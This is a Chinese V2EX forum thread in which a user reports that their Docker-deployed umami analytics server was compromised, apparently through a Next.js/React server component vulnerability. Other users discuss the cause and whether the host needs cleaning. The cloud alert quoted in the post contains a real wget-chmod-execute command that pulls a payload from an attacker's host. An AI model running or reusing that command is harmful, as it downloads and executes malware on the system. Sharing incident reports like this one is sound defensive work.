服务器安装的 umami 也被入侵了!

19 天前
 183shl

晚上收到阿里云告警可疑命令执行

告警原因
检测模型发现您的服务器上执行的进程命令行高度可疑,很有可能与木马、病毒、黑客行为有关。
用户名
www
命令行
/bin/sh -c wget -O /tmp/nginx3 http://res.qiqigece.top/nginx1;chmod 777 /tmp/nginx3;/tmp/nginx3
进程 ID
241050
父进程 ID
1061286
进程链
-[1061043]  /usr/bin/containerd-shim-runc-v2 -namespace moby -id 5ae04de666d9af832833653883924afe2522ae749cf1635f8e16a086779c6dc4 -address /run/containerd/containerd.sock
    -[1061069]  node /usr/local/bin/pnpm start-docker
        -[1061113]  node /app/node_modules/.bin/../.pnpm/npm-run-all@4.1.5/node_modules/npm-run-all/bin/npm-run-all/index.js check-db update-tracker set-routes-manifest start-server
            -[1061275]  node /usr/local/lib/node_modules/pnpm/bin/pnpm.cjs run start-server
                -[1061286]  next-server (v

微步检测:

https://s.threatbook.com/report/url/19a03bf704e725d1e64a84b8a245a043

我是在 docker 部署的,只移除 docker 安全吗?

2962 次点击
所在节点    信息安全
8 条回复
ysicing
19 天前
最近不是说 nextjs 和 react 漏洞问题么。昨天披露的,今天就有好多 poc 了,我们今天就接到好多的入侵挂码的😂
ysicing
19 天前
@ysicing https://github.com/umami-software/umami/issues/3829
183shl
19 天前
@ysicing 没关注到这个信息。平时这个小服务器也根本不看的,还好阿里云给告警了。看了下日志,发现周五凌晨入侵的,晚六点开始的远程下载。
abear
19 天前
这玩意被入侵了,要重装系统吗 ^-^
ysicing
19 天前
@abear 容器没特权的或者能提权调用宿主机服务的话,应该是不需要的
zerolover
18 天前
umami 挺好用的,目前我们还是用官网的服务,主要是我们网站访问量没有太多。等后面再自己部署
tabc2tgacd
18 天前
react 的服务器组件漏洞
daisyfloor
8 小时 49 分钟前
我也是 docker 部署,怎么知道有么有中招?最终如何安全的解决?

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://ex.noerr.eu.org/t/1177209

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX